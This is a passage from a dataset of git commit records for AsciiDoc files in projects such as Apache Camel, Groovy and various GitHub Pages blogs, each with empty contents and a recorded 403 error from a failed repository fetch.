oovy,adjohnson916\/groovy-core,samanalysis\/incubator-groovy,tkruse\/incubator-groovy,kenzanmedia\/incubator-groovy,christoph-frick\/groovy-core,nobeans\/incubator-groovy,genqiang\/incubator-groovy,graemerocher\/incubator-groovy,graemerocher\/incubator-groovy,gillius\/incubator-groovy,apache\/groovy,adjohnson916\/incubator-groovy,kenzanmedia\/incubator-groovy,upadhyayap\/incubator-groovy,ebourg\/groovy-core,fpavageau\/groovy,antoaravinth\/incubator-groovy,aaronzirbes\/incubator-groovy,paulk-asert\/groovy,jwagenleitner\/groovy,sagarsane\/incubator-groovy,bsideup\/groovy-core,sagarsane\/incubator-groovy,paulk-asert\/groovy,PascalSchumacher\/incubator-groovy,kenzanmedia\/incubator-groovy,EPadronU\/incubator-groovy,kidaa\/incubator-groovy,rabbitcount\/incubator-groovy,kidaa\/incubator-groovy,ebourg\/groovy-core,dpolivaev\/groovy,paulk-asert\/incubator-groovy,aaronzirbes\/incubator-groovy,samanalysis\/incubator-groovy,nkhuyu\/incubator-groovy,i55ac\/incubator-groovy,avafanasiev\/groovy,paplorinc\/incubator-groovy,rlovtangen\/groovy-core,sagarsane\/groovy-core,russel\/incubator-groovy,ChanJLee\/incubator-groovy,russel\/groovy,ebourg\/incubator-groovy,paulk-asert\/incubator-groovy,gillius\/incubator-groovy,taoguan\/incubator-groovy,upadhyayap\/incubator-groovy,rabbitcount\/incubator-groovy,rabbitcount\/incubator-groovy,taoguan\/incubator-groovy,EPadronU\/incubator-groovy,shils\/incubator-groovy,bsideup\/groovy-core,upadhyayap\/incubator-groovy,groovy\/groovy-core,mariogarcia\/groovy-core,bsideup\/groovy-core,shils\/groovy,yukangguo\/incubator-groovy,i55ac\/incubator-groovy,genqiang\/incubator-groovy,groovy\/groovy-core,jwagenleitner\/incubator-groovy,aim-for-better\/incubator-groovy,guangying945\/incubator-groovy,tkruse\/incubator-groovy,shils\/groovy,alien11689\/incubator-groovy,genqiang\/incubator-groovy,armsargis\/groovy,aaronzirbes\/incubator-groovy,apache\/incubator-groovy,dpolivaev\/groovy,yukangguo\/incubator-groovy,ebourg\/groovy-core,christoph-frick\/groovy-core,groovy\/groovy-core,jwagenleitner\/groovy,eginez\/incubator-groovy,apache\/groovy,groovy\/groovy-core,paulk-asert\/groovy,i55ac\/incubator-groovy,avafanasiev\/groovy,antoaravinth\/incubator-groovy,samanalysis\/incubator-groovy,pledbrook\/incubator-groovy,nobeans\/incubator-groovy,russel\/groovy,upadhyayap\/incubator-groovy,eginez\/incubator-groovy,adjohnson916\/incubator-groovy,apache\/groovy,apache\/groovy,sagarsane\/groovy-core,rlovtangen\/groovy-core,sagarsane\/groovy-core,graemerocher\/incubator-groovy,antoaravinth\/incubator-groovy,nkhuyu\/incubator-groovy,sagarsane\/incubator-groovy,christoph-frick\/groovy-core,aim-for-better\/incubator-groovy,mariogarcia\/groovy-core,eginez\/incubator-groovy,fpavageau\/groovy,PascalSchumacher\/incubator-groovy,rabbitcount\/incubator-groovy,ebourg\/groovy-core,bsideup\/groovy-core","old_file":"src\/spec\/doc\/invokedynamic-support.adoc","new_file":"src\/spec\/doc\/invokedynamic-support.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kidaa\/incubator-groovy.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0a2c917a1f67852c6d3a2af375a40b7755fe36f3","subject":"Update 2016-01-04-Functional-Rotterdam-5th-Edition.adoc","message":"Update 
2016-01-04-Functional-Rotterdam-5th-Edition.adoc","repos":"pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io","old_file":"_posts\/2016-01-04-Functional-Rotterdam-5th-Edition.adoc","new_file":"_posts\/2016-01-04-Functional-Rotterdam-5th-Edition.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pepite\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eea10d7d325c989c35b5dd85cd874d3b4fdf6755","subject":"Update 2016-11-30-I-went-to-the-A-W-S-headquarters.adoc","message":"Update 2016-11-30-I-went-to-the-A-W-S-headquarters.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-30-I-went-to-the-A-W-S-headquarters.adoc","new_file":"_posts\/2016-11-30-I-went-to-the-A-W-S-headquarters.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b859087715f105a32cf4deb885f98703fb927ad7","subject":"Update 2016-12-25-NSUCRYPT-2016-RESULT.adoc","message":"Update 2016-12-25-NSUCRYPT-2016-RESULT.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-12-25-NSUCRYPT-2016-RESULT.adoc","new_file":"_posts\/2016-12-25-NSUCRYPT-2016-RESULT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8d7849803680ccd8e1730c1e878e7d9bd2337633","subject":"y2b create post AVerMedia Game Capture HD Unboxing","message":"y2b create post AVerMedia Game Capture HD Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-12-09-AVerMedia-Game-Capture-HD-Unboxing.adoc","new_file":"_posts\/2011-12-09-AVerMedia-Game-Capture-HD-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6946dd7a029b0602176d5546c5ee69ce6b3af357","subject":"Update 2015-03-14-EmberJS-at-SRXP.adoc","message":"Update 2015-03-14-EmberJS-at-SRXP.adoc","repos":"ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io","old_file":"_posts\/2015-03-14-EmberJS-at-SRXP.adoc","new_file":"_posts\/2015-03-14-EmberJS-at-SRXP.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ElteHupkes\/eltehupkes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"918b41cd6f602899324f98274cce046d178fde55","subject":"Update 2019-01-31-Your-Blog-title.adoc","message":"Update 
2019-01-31-Your-Blog-title.adoc","repos":"raytong82\/raytong82.github.io,raytong82\/raytong82.github.io,raytong82\/raytong82.github.io,raytong82\/raytong82.github.io","old_file":"_posts\/2019-01-31-Your-Blog-title.adoc","new_file":"_posts\/2019-01-31-Your-Blog-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/raytong82\/raytong82.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a05a41f201285499e4269320ecd6e362bfbaa2a8","subject":"Added Xquery-language docs to Gitbook","message":"Added Xquery-language docs to Gitbook\n","repos":"akhettar\/camel,RohanHart\/camel,akhettar\/camel,w4tson\/camel,salikjan\/camel,akhettar\/camel,nicolaferraro\/camel,kevinearls\/camel,rmarting\/camel,sverkera\/camel,w4tson\/camel,adessaigne\/camel,jamesnetherton\/camel,sirlatrom\/camel,sirlatrom\/camel,snurmine\/camel,tdiesler\/camel,rmarting\/camel,adessaigne\/camel,nboukhed\/camel,pax95\/camel,sverkera\/camel,RohanHart\/camel,driseley\/camel,w4tson\/camel,snurmine\/camel,driseley\/camel,apache\/camel,pax95\/camel,onders86\/camel,scranton\/camel,davidkarlsen\/camel,veithen\/camel,acartapanis\/camel,zregvart\/camel,NickCis\/camel,gnodet\/camel,dmvolod\/camel,veithen\/camel,sirlatrom\/camel,tdiesler\/camel,CodeSmell\/camel,curso007\/camel,snurmine\/camel,mgyongyosi\/camel,acartapanis\/camel,jonmcewen\/camel,isavin\/camel,driseley\/camel,anoordover\/camel,neoramon\/camel,bgaudaen\/camel,Thopap\/camel,sabre1041\/camel,yuruki\/camel,tlehoux\/camel,allancth\/camel,gnodet\/camel,cunningt\/camel,RohanHart\/camel,pmoerenhout\/camel,jkorab\/camel,kevinearls\/camel,drsquidop\/camel,rmarting\/camel,curso007\/camel,drsquidop\/camel,jamesnetherton\/camel,lburgazzoli\/apache-camel,neoramon\/camel,RohanHart\/camel,tadayosi\/camel,Thopap\/camel,DariusX\/camel,zregvart\/camel,davidkarlsen\/camel,neoramon\/camel,lburgazzoli\/apache-camel,christophd\/camel,jamesnetherton\/camel,mgyongyosi\/camel,dmvolod\/camel,RohanHart\/camel,rmarting\/camel,pkletsko\/camel,mcollovati\/camel,bgaudaen\/camel,jonmcewen\/camel,ssharma\/camel,curso007\/camel,pax95\/camel,lburgazzoli\/camel,ullgren\/camel,ssharma\/camel,cunningt\/camel,yuruki\/camel,tdiesler\/camel,tkopczynski\/camel,akhettar\/camel,bgaudaen\/camel,pkletsko\/camel,sabre1041\/camel,RohanHart\/camel,acartapanis\/camel,kevinearls\/camel,tadayosi\/camel,snurmine\/camel,scranton\/camel,lburgazzoli\/apache-camel,jamesnetherton\/camel,anton-k11\/camel,akhettar\/camel,onders86\/camel,davidkarlsen\/camel,driseley\/camel,onders86\/camel,dmvolod\/camel,nboukhed\/camel,ssharma\/camel,jarst\/camel,w4tson\/camel,christophd\/camel,prashant2402\/camel,bhaveshdt\/camel,jonmcewen\/camel,cunningt\/camel,acartapanis\/camel,adessaigne\/camel,drsquidop\/camel,objectiser\/camel,allancth\/camel,anoordover\/camel,sverkera\/camel,jkorab\/camel,tkopczynski\/camel,anton-k11\/camel,drsquidop\/camel,sabre1041\/camel,lburgazzoli\/camel,kevinearls\/camel,neoramon\/camel,gilfernandes\/camel,veithen\/camel,gautric\/camel,jonmcewen\/camel,objectiser\/camel,tadayosi\/camel,pmoerenhout\/camel,gnodet\/camel,pax95\/camel,NickCis\/camel,driseley\/camel,jkorab\/camel,ssharma\/camel,jarst\/camel,nikhilvibhav\/camel,tkopczynski\/camel,tlehoux\/camel,hqstevenson\/camel,prashant2402\/camel,nboukhed\/camel,gnodet\/camel,snurmine\/camel,tlehoux\/camel,lburgazzoli\/camel,jamesnetherton\/camel,adessaigne\/camel,tlehoux\/camel,lburgazzoli\/camel,dmvolod\/camel,alvinkwekel\/camel,bhaveshdt\/camel,sverkera\/camel,
drsquidop\/camel,lburgazzoli\/apache-camel,gnodet\/camel,tlehoux\/camel,anoordover\/camel,chirino\/camel,bgaudaen\/camel,DariusX\/camel,yuruki\/camel,jarst\/camel,zregvart\/camel,yuruki\/camel,apache\/camel,allancth\/camel,gautric\/camel,Fabryprog\/camel,ullgren\/camel,apache\/camel,gautric\/camel,nicolaferraro\/camel,gilfernandes\/camel,anoordover\/camel,prashant2402\/camel,apache\/camel,bhaveshdt\/camel,rmarting\/camel,acartapanis\/camel,Thopap\/camel,gilfernandes\/camel,anton-k11\/camel,alvinkwekel\/camel,prashant2402\/camel,mgyongyosi\/camel,jonmcewen\/camel,sirlatrom\/camel,chirino\/camel,hqstevenson\/camel,chirino\/camel,veithen\/camel,gautric\/camel,jkorab\/camel,alvinkwekel\/camel,apache\/camel,nikhilvibhav\/camel,jarst\/camel,anton-k11\/camel,tkopczynski\/camel,allancth\/camel,Thopap\/camel,davidkarlsen\/camel,tkopczynski\/camel,ssharma\/camel,anoordover\/camel,mcollovati\/camel,sverkera\/camel,Fabryprog\/camel,nicolaferraro\/camel,jkorab\/camel,kevinearls\/camel,pkletsko\/camel,lburgazzoli\/apache-camel,prashant2402\/camel,hqstevenson\/camel,allancth\/camel,pmoerenhout\/camel,acartapanis\/camel,scranton\/camel,ullgren\/camel,sabre1041\/camel,nboukhed\/camel,CodeSmell\/camel,prashant2402\/camel,tlehoux\/camel,onders86\/camel,mgyongyosi\/camel,christophd\/camel,isavin\/camel,driseley\/camel,sabre1041\/camel,hqstevenson\/camel,lburgazzoli\/apache-camel,punkhorn\/camel-upstream,pax95\/camel,onders86\/camel,anoordover\/camel,nicolaferraro\/camel,chirino\/camel,sabre1041\/camel,tdiesler\/camel,yuruki\/camel,ullgren\/camel,neoramon\/camel,CodeSmell\/camel,jarst\/camel,tadayosi\/camel,w4tson\/camel,dmvolod\/camel,nboukhed\/camel,w4tson\/camel,pkletsko\/camel,punkhorn\/camel-upstream,pax95\/camel,salikjan\/camel,akhettar\/camel,tdiesler\/camel,jkorab\/camel,tdiesler\/camel,chirino\/camel,pmoerenhout\/camel,DariusX\/camel,NickCis\/camel,yuruki\/camel,lburgazzoli\/camel,mcollovati\/camel,curso007\/camel,lburgazzoli\/camel,gilfernandes\/camel,isavin\/camel,bhaveshdt\/camel,NickCis\/camel,rmarting\/camel,scranton\/camel,curso007\/camel,veithen\/camel,pkletsko\/camel,bhaveshdt\/camel,scranton\/camel,DariusX\/camel,sirlatrom\/camel,tadayosi\/camel,isavin\/camel,tkopczynski\/camel,veithen\/camel,punkhorn\/camel-upstream,cunningt\/camel,christophd\/camel,bgaudaen\/camel,snurmine\/camel,neoramon\/camel,drsquidop\/camel,cunningt\/camel,mgyongyosi\/camel,onders86\/camel,jonmcewen\/camel,cunningt\/camel,adessaigne\/camel,apache\/camel,scranton\/camel,sverkera\/camel,ssharma\/camel,gilfernandes\/camel,Fabryprog\/camel,allancth\/camel,nikhilvibhav\/camel,zregvart\/camel,CodeSmell\/camel,gilfernandes\/camel,hqstevenson\/camel,nboukhed\/camel,anton-k11\/camel,kevinearls\/camel,pkletsko\/camel,sirlatrom\/camel,pmoerenhout\/camel,tadayosi\/camel,objectiser\/camel,isavin\/camel,mcollovati\/camel,christophd\/camel,bhaveshdt\/camel,NickCis\/camel,NickCis\/camel,hqstevenson\/camel,nikhilvibhav\/camel,dmvolod\/camel,adessaigne\/camel,Thopap\/camel,anton-k11\/camel,gautric\/camel,bgaudaen\/camel,jamesnetherton\/camel,mgyongyosi\/camel,curso007\/camel,pmoerenhout\/camel,objectiser\/camel,christophd\/camel,Thopap\/camel,chirino\/camel,isavin\/camel,gautric\/camel,jarst\/camel,alvinkwekel\/camel,Fabryprog\/camel,punkhorn\/camel-upstream","old_file":"components\/camel-saxon\/src\/main\/docs\/xquery-language.adoc","new_file":"components\/camel-saxon\/src\/main\/docs\/xquery-language.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/allancth\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"da07db33099870098962982e9929b4579ed0970f","subject":"Update 2003-03-03-Install-Zimbra-Mail-Server-on-Red-Hat.adoc","message":"Update 2003-03-03-Install-Zimbra-Mail-Server-on-Red-Hat.adoc","repos":"fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io","old_file":"_posts\/2003-03-03-Install-Zimbra-Mail-Server-on-Red-Hat.adoc","new_file":"_posts\/2003-03-03-Install-Zimbra-Mail-Server-on-Red-Hat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fauzanooor\/fauzanooor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e1456625a90f09a00437b30e673ada1b6d2bcf89","subject":"Update 2016-08-20-Trackpad-Woes.adoc","message":"Update 2016-08-20-Trackpad-Woes.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2016-08-20-Trackpad-Woes.adoc","new_file":"_posts\/2016-08-20-Trackpad-Woes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ebedd426d3dcd648f7e4e058ba5305c0d796a82b","subject":"PLANNER-431: Add upgrade recipe archive","message":"PLANNER-431: Add upgrade recipe archive\n","repos":"oskopek\/optaplanner-website,oskopek\/optaplanner-website,droolsjbpm\/optaplanner-website,droolsjbpm\/optaplanner-website,oskopek\/optaplanner-website,droolsjbpm\/optaplanner-website","old_file":"download\/upgradeRecipe\/upgradeRecipeArchive.adoc","new_file":"download\/upgradeRecipe\/upgradeRecipeArchive.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oskopek\/optaplanner-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6a1f2f32f486a42bcd19f52f84ab0a239559071c","subject":"Update 2016-06-30-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste.adoc","message":"Update 2016-06-30-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-30-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste.adoc","new_file":"_posts\/2016-06-30-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"91c069b05e5b6be2369b1c06c2cfa77557016590","subject":"Update 2017-09-30-Matrix-Layer-Rotation.adoc","message":"Update 2017-09-30-Matrix-Layer-Rotation.adoc","repos":"JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io","old_file":"_posts\/2017-09-30-Matrix-Layer-Rotation.adoc","new_file":"_posts\/2017-09-30-Matrix-Layer-Rotation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to 
access 'https:\/\/github.com\/JithinPavithran\/JithinPavithran.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"46d8c1d04938d1ce8f5858c5fe695520a73a14b7","subject":"Update 2017-09-30-Matrix-Layer-Rotation.adoc","message":"Update 2017-09-30-Matrix-Layer-Rotation.adoc","repos":"JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io","old_file":"_posts\/2017-09-30-Matrix-Layer-Rotation.adoc","new_file":"_posts\/2017-09-30-Matrix-Layer-Rotation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/JithinPavithran\/JithinPavithran.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"975973fdde37ba9ca9c0a9505cb87dbd1ea3ff83","subject":"Update 2016-09-23-wtf-log.adoc","message":"Update 2016-09-23-wtf-log.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-23-wtf-log.adoc","new_file":"_posts\/2016-09-23-wtf-log.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"67b0f82e255eff7b879b9da4ece41ea2634c2283","subject":"Update 2017-07-04-Azure-5.adoc","message":"Update 2017-07-04-Azure-5.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-04-Azure-5.adoc","new_file":"_posts\/2017-07-04-Azure-5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"02acbd900e804536899f186b76ff6e3af45485d0","subject":"Update 2018-11-08-develop.adoc","message":"Update 2018-11-08-develop.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-08-develop.adoc","new_file":"_posts\/2018-11-08-develop.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"30ab353e9d8aafe8ae58f25e9278c79bd4c31166","subject":"y2b create post JBL Onbeat Venue LT Unboxing (Wireless Speaker for iPhone 5 \\u0026 More)","message":"y2b create post JBL Onbeat Venue LT Unboxing (Wireless Speaker for iPhone 5 \\u0026 More)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-01-28-JBL-Onbeat-Venue-LT-Unboxing-Wireless-Speaker-for-iPhone-5-u0026-More.adoc","new_file":"_posts\/2013-01-28-JBL-Onbeat-Venue-LT-Unboxing-Wireless-Speaker-for-iPhone-5-u0026-More.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"53a3076e1c73a77f6ec2ff82552482539e346219","subject":"Add docs on turbine.combineHostPort","message":"Add docs on turbine.combineHostPort\n","repos":"sfat\/spring-cloud-netflix,joshiste\/spring-cloud-netflix,elgohr\/spring-cloud-netflix,jkschneider\/spring-cloud-netflix,elgohr\/spring-cloud-netflix,bijukunjummen\/spring-cloud-netflix,elgohr\/spring-cloud-netflix,sfat\/spring-cloud-netflix,ryanjbaxter\/spring-cloud-netflix,bijukunjummen\/spring-cloud-netflix,spring-cloud\/spring-cloud-netflix,ryanjbaxter\/spring-cloud-netflix,ryanjbaxter\/spring-cloud-netflix,jkschneider\/spring-cloud-netflix,brenuart\/spring-cloud-netflix,joshiste\/spring-cloud-netflix,elgohr\/spring-cloud-netflix,jkschneider\/spring-cloud-netflix,jkschneider\/spring-cloud-netflix,shuiky\/spring-cloud-netflix,shuiky\/spring-cloud-netflix,sfat\/spring-cloud-netflix,ryanjbaxter\/spring-cloud-netflix,shuiky\/spring-cloud-netflix,bijukunjummen\/spring-cloud-netflix,brenuart\/spring-cloud-netflix,sfat\/spring-cloud-netflix,brenuart\/spring-cloud-netflix,joshiste\/spring-cloud-netflix,shuiky\/spring-cloud-netflix,ryanjbaxter\/spring-cloud-netflix,bijukunjummen\/spring-cloud-netflix,joshiste\/spring-cloud-netflix,brenuart\/spring-cloud-netflix,bijukunjummen\/spring-cloud-netflix,elgohr\/spring-cloud-netflix,sfat\/spring-cloud-netflix,brenuart\/spring-cloud-netflix,shuiky\/spring-cloud-netflix,jkschneider\/spring-cloud-netflix,joshiste\/spring-cloud-netflix,spring-cloud\/spring-cloud-netflix","old_file":"docs\/src\/main\/asciidoc\/spring-cloud-netflix.adoc","new_file":"docs\/src\/main\/asciidoc\/spring-cloud-netflix.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sfat\/spring-cloud-netflix.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a93fb512aafd91a17dc438b148d1411193c4617e","subject":"added who uses...","message":"added who uses...\n","repos":"docToolchain\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain","old_file":"src\/docs\/025_development\/050_who-uses-dtc.adoc","new_file":"src\/docs\/025_development\/050_who-uses-dtc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/docToolchain\/docToolchain.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fd79f82e37f4f4a1ba0a723a6d99f8754fcebdbd","subject":"Update 2015-04-30-Automaticke-overovani-DHPC-pripojeni.adoc","message":"Update 2015-04-30-Automaticke-overovani-DHPC-pripojeni.adoc","repos":"silesnet\/silesnet.github.io,silesnet\/silesnet.github.io,silesnet\/silesnet.github.io","old_file":"_posts\/2015-04-30-Automaticke-overovani-DHPC-pripojeni.adoc","new_file":"_posts\/2015-04-30-Automaticke-overovani-DHPC-pripojeni.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/silesnet\/silesnet.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d317d1c0341389f7a8ec6fefc8975e0998e5ac87","subject":"Update 2016-01-25-Moving-from-Spain-to-the-Netherlands.adoc","message":"Update 
2016-01-25-Moving-from-Spain-to-the-Netherlands.adoc","repos":"pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io","old_file":"_posts\/2016-01-25-Moving-from-Spain-to-the-Netherlands.adoc","new_file":"_posts\/2016-01-25-Moving-from-Spain-to-the-Netherlands.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pepite\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"03c09089a7fe4f4d8ce274211afdc150ad33726d","subject":"Update 2016-6-25-Git-one.adoc","message":"Update 2016-6-25-Git-one.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-6-25-Git-one.adoc","new_file":"_posts\/2016-6-25-Git-one.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"29f025c5ee945441c0a22c5426bec7b51aec6b4c","subject":"Update 2017-04-06-Test-1.adoc","message":"Update 2017-04-06-Test-1.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-04-06-Test-1.adoc","new_file":"_posts\/2017-04-06-Test-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3d9f1d852c3b78994173b770f09832fa457bbe19","subject":"Update 2018-02-09-Keras-quick-way-to-order-word-by-T-F-I-D-F-to-generate-a-list-of-stopword.adoc","message":"Update 2018-02-09-Keras-quick-way-to-order-word-by-T-F-I-D-F-to-generate-a-list-of-stopword.adoc","repos":"kfkelvinng\/kfkelvinng.github.io,kfkelvinng\/kfkelvinng.github.io,kfkelvinng\/kfkelvinng.github.io,kfkelvinng\/kfkelvinng.github.io","old_file":"_posts\/2018-02-09-Keras-quick-way-to-order-word-by-T-F-I-D-F-to-generate-a-list-of-stopword.adoc","new_file":"_posts\/2018-02-09-Keras-quick-way-to-order-word-by-T-F-I-D-F-to-generate-a-list-of-stopword.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kfkelvinng\/kfkelvinng.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eee4b00b7c93a1905eac51f12422dfafdca932dd","subject":"y2b create post Mobee Magic Charger Unboxing (Apple Magic Mouse)","message":"y2b create post Mobee Magic Charger Unboxing (Apple Magic Mouse)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-11-22-Mobee-Magic-Charger-Unboxing-Apple-Magic-Mouse.adoc","new_file":"_posts\/2011-11-22-Mobee-Magic-Charger-Unboxing-Apple-Magic-Mouse.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"108d8905e290e6c8c9c7fbaaf13925792abd74fd","subject":"Add note to docs regarding JAVA_HOME on Windows","message":"Add note to docs regarding JAVA_HOME on Windows\n\nFor the Windows service, JAVA_HOME should be set to the path to the\r\nJDK. 
